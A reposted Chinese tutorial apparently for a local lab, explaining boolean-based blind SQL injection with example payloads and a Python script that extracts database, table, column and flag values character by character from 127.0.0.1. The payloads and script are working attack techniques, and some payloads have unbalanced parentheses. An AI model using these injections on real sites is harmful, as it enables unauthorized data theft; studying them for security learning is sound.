布尔盲注步骤 - 代码天地

布尔盲注步骤

企业开发 2023-10-04 18:36:25 阅读次数: 0

使用场景：

在没有数据回显的情况下，是不显示具体内容，但会显示有结果或没结果的一种二分的方式（例如：显示用户名或密码错误）

通常逐个爆破猜解，效率偏低

思路：利用回显的不同，推测sql语句执行的结果是true还是false

在and后的判断条件稍作更改

例: select * from users where id='1' and (select length(database())=1)#

过程：

获取数据库名的具体信息：

left(a,b)从左侧截取 a 的前 b 位：left(select database(),1)>'s'

substr(a,b,c)从b位置开始，截取字符串a的c长度

mid(a,b,c)从位置b开始，截取a字符串的c位

ascii()将某个字符转换为ascii值：ascii(substr(user),1,1))=101"#

脚本

import requests
url = "http://127.0.0.1/sqli/3.php?id=0 or ascii(substr(select database()),%s,1))=%d--+"
url = "http://127.0.0.1/sqli/3.php?id=0 or ascii(substr(select group_concat(table_name) from information_schema.tables where table_schema=database()),%s,1))=%d--+"
url = "http://127.0.0.1/sqli/3.php?id=0 or ascii(substr(select group_concat(column_name) from information_schema.columns where table_name='answer'),%s,1))=%d--+"
url = "http://127.0.0.1/sqli/3.php?id=0 or ascii(substr(group_concat(flag) from answer),%s,1))=%d--+"
result = ""

for i in range(1,100):
    for j in range(33,127):
        payload = url%(i,j)
        s = requests.get(url=payload)
        if "查询" in s.text:
            result += chr(j)
            print(result)
            break
print(result)

**
i代表依次从1-100位，遍历所得结果字符串的第i位
j从33-127包含了ascii中所有可见字符，代表逐个比对判断第n个字符是哪个字符
url%（i，j）其中%代表将（）中的字符替换到url表达式的占位符中
requests.get 使用requests库中的get方法，发送get请求到url中
chr（）函数将ascii码字符转换成字符串

猜你喜欢

转载自blog.csdn.net/weixin_68177269/article/details/132495626

布尔盲注步骤

布尔盲注

布尔盲注怎么用，一看你就明白了。布尔盲注原理+步骤+实战教程

布尔盲注新姿势

SQL注入——布尔盲注

sqlmap注入（布尔盲注）

SQL布尔盲注漏洞

布尔盲注小技巧

布尔型盲注时间型盲注

web渗透—— 基于布尔类型的盲注

SQL盲注注入——布尔型

SQL注入——布尔型盲注

Oracle基于布尔的盲注总结

sql注入之布尔盲注

2、SQl布尔盲注模块——DVWA

sql注入学习——布尔盲注

sql注入--盲注（布尔、时间、报错）

POST基于时间和布尔的盲注

布尔盲注之sqlmap爆破

SQL注入漏洞测试(布尔盲注)

盲注学习(sqli-labs 8(布尔盲注) 9(时间盲注))

Microsoft SQL Server手注之布尔型盲注

SQL注入——布尔盲注，时间盲注，宽字节注入

DVWA-基于布尔值的盲注与基于时间的盲注学习笔记

sqli-labs攻关2(布尔盲注、时间盲注)

使用Burpsuite进行半自动注入布尔盲注和时间盲注个人总结

MySQL之布尔盲注实战(3分钟搞懂盲注思路)

sql 注入基于布尔值的盲注

应用布尔盲注来爆库（1）

sql注入基于布尔/时间的盲注详解

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

周排行

购置笔记本常识

从源码看Spring Security之采坑笔记（Spring Boot篇）

大数据学习——高可用配置案例

如何避免选择不专业的建站公司?

Euclid's Game HDU - 1525（博弈）

面试笔记（六）---Js实现eventHandler

Windows 实例搭建的 FTP 在外网无法连接和访问

设计模式 : 桥接模式

USB 设备驱动开发之几个重要结构体分析

14-p14_sqrt求平方根

每日归档

更多

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)